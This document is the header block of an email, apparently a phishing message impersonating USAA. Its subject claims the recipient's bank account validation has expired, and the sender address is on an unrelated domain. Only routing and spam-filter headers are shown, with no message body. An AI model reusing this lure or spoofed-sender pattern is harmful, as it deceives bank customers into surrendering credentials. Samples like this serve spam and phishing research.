X-Spam-Summary: 10,1,0,d41d8cd98f00b204,d41d8cd98f00b204,accountvalidation-usaa@tls.com,:accountvalidation-usaa@tls.com,RULES_HIT:41:379:871:988:989:1193:1254:1260:1313:1314:1381:1516:1518:1522:1536:1575:1594:1692:1711:1730:1747:1764:1777:1792:2392:2393:2559:2562:3138:3139:3140:3141:3142:3876:3877:5007:6114:6261:6264:6642:6687:6748:7281:7398:10004:10400:11537:11604:11658:11914:12340:12561:13110:13439:14829:21080:30001:30007:30026:30054:30055:30069,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:error,Custom_rules:0:0:0,LFtime:2000,LUA_SUMMARY:none
X-HE-Tag: trip77_2e0eb3f61a15f
X-Filterd-Recvd-Size: 125684
Received: from smtpbig004.earthlinkbusiness.com (smtpbig004.earthlinkbusiness.com [69.95.226.24])
	by imf22.b.hostedemail.com (Postfix) with SMTP
	for <jose@monkey.org>; Tue,  4 Oct 2016 06:41:56 +0000 (UTC)
Received: (qmail 260 invoked from network); 4 Oct 2016 05:04:23 -0000
Received: from unknown (HELO ?107.7.74.69?) (107.7.74.69)
  by smtpbig004.onecommunications.net with SMTP; 4 Oct 2016 05:04:23 -0000
Content-Type: multipart/mixed; boundary="===============1365213684=="
MIME-Version: 1.0
Subject: Your USAA Bank Account Validation Has Expired
To: Recipients <accountvalidation-usaa@tls.com>
